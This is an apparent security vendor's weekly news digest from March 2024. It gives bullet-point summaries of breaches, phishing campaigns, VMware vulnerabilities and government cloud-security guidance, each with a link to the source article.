Information Security News 3-11-2024

Share This Post

UnitedHealth Sets Timeline to Restore Change Healthcare Systems After BlackCat Hit

Article Link: https://www.infosecurity-magazine.com/news/unitedhealth-restore-change/

  • UnitedHealth Group has published a timeline to restore Change Healthcare’s systems
  • The healthcare conglomerate, which owns Change Healthcare, said it expects key pharmacy and payment systems to be restored and available by March 18.
  • The ongoing incident was described by Rick Pollard, American Hospital Association (AHA) President and CEO, on March 5 as “the most significant and consequential incident of its kind against the US healthcare system in history.”

CISA, NSA share best practices for securing cloud services

Article Link: https://www.bleepingcomputer.com/news/security/cisa-nsa-share-best-practices-for-securing-cloud-services/

  • The NSA and the Cybersecurity and Infrastructure Security Agency (CISA) have released five joint cybersecurity bulletins containing on best practices for securing a cloud environment.
  • These guides focus on identity and access management solutions, key management solutions, encrypting data in the cloud, managing cloud storage, and mitigating risks from managed service providers.
  • In 2021, Microsoft issued a report on how the Russian Nobelium threat actors were actively targeting cloud services and managed service providers to target their downstream customers, including their internal networks.

MiTM phishing attack can let attackers unlock and steal a Tesla

Article Link: https://www.bleepingcomputer.com/news/security/mitm-phishing-attack-can-let-attackers-unlock-and-steal-a-tesla/

  • Researchers demonstrated how they could conduct a Man-in-the-Middle (MiTM) phishing attack to compromise Tesla accounts, unlocking cars, and starting them.
  • The researchers reported their findings to Tesla saying that linking a car to a new phone lacks proper authentication security. However, the car maker determined the report to be out of scope.
  • Mysk says that adding a new Phone Key through the app does not require the car to be unlocked or the smartphone to be inside the vehicle, which makes for significant security gap.
  • With the new Phone Key, the attacker can unlock the car and activate all its systems, allowing them to drive away as if they were the owner.

VMware fixes critical sandbox escape flaws in ESXi, Workstation, and Fusion

Article Link: https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-sandbox-escape-flaws-in-esxi-workstation-and-fusion/

  • VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation products, allowing attackers to escape virtual machines and access the host operating system.
  • A practical workaround to mitigate CVE-2024-22252, CVE-2024-22253, and CVE-2024-22255 is to remove USB controllers from virtual machines following the instructions provided by the vendor.
  • It is worth noting that VMware has made security fixes available for older ESXi versions (6.7U3u), 6.5 (6.5U3v), and VCF 3.x due to the vulnerabilities’ severity.

Hackers steal Windows NTLM authentication hashes in phishing attacks

Article Link: https://www.bleepingcomputer.com/news/security/hackers-steal-windows-ntlm-authentication-hashes-in-phishing-attacks/

  • The hacking group known as TA577 has recently shifted tactics by using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to perform account hijacks.
  • The new campaign started with phishing emails that appear to be replies to a target’s previous discussion, a technique known as thread hijacking.
  • The emails attach unique (per victim) ZIP archives containing HTML files that use META refresh HTML tags to trigger an automatic connection to a text file on an external Server Message Block (SMB) server.
  • When the Windows device connects to the server, it will automatically attempt to perform an NTLMv2 Challenge/Response, allowing the remote attacker-controlled server to steal the NTLM authentication hashes.

Dropbox Used to Steal Credentials and Bypass MFA in Novel Phishing Campaign

Article Link: https://www.infosecurity-magazine.com/news/dropbox-credentials-bypass-mfa/

  • A novel phishing campaign leveraged legitimate Dropbox infrastructure and successfully bypassed multifactor authentication (MFA) protocols, new research from Darktrace has revealed.
  • The findings also show how attackers are becoming adept at evading standard security protocols, including email detection tools and MFA.
  • The researchers noted that there is “very little to distinguish” malicious or benign emails from automated emails used by legitimate services such as Dropbox. Therefore, this approach is effective in evading email security tools and convincing targets to click a malicious link.

American Express credit cards exposed in third-party data breach

Article Link: https://www.bleepingcomputer.com/news/security/american-express-credit-cards-exposed-in-third-party-data-breach/

  • American Express is warning customers that credit cards were exposed in a third-party data breach after a merchant processor was hacked.
  • This incident was not caused by a data breach at American Express, but rather at a merchant processor in which American Express Card member data was processed. 
  • It is unclear how many customers were impacted, what merchant processor was breached, and when the attack occurred.

Microsoft says Russian hackers breached its systems, accessed source code

Article Link: https://www.theregister.com/2024/03/08/microsoft_confirms_russian_spies_stole/

  • Microsoft says the Russian ‘Midnight Blizzard’ hacking group recently accessed some of its internal systems and source code repositories using authentication secrets stolen during a January cyberattack.
  • While Microsoft has not explained precisely what these “secrets” include, they are likely authentication tokens, API keys, or credentials.
  • For this reason, companies must configure MFA on all accounts to prevent access, even if credentials are correctly guessed.


Reach out to our incident response team for help

More To Explore

Information Security News – 1/6/2025

Emerging Threats & Vulnerabilities to Prepare for in 2025 Article Link: https://www.darkreading.com/vulnerabilities-threats/emerging-threats-vulnerabilities-prepare-2025 These Were the Badly Handled Data Breaches of 2024 Article Link: https://techcrunch.com/2024/12/26/badly-handled-data-breaches-2024/ Biden

Information Security News – 12/23/2024

CISA Orders Federal Agencies to Secure Microsoft 365 Tenants Article Link: https://www.bleepingcomputer.com/news/security/cisa-orders-federal-agencies-to-secure-microsoft-365-tenants/amp/Hackers Using New IoT/OT Malware IOCONTROL To Control IP Cameras, Routers, PLCs, HMIs And

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.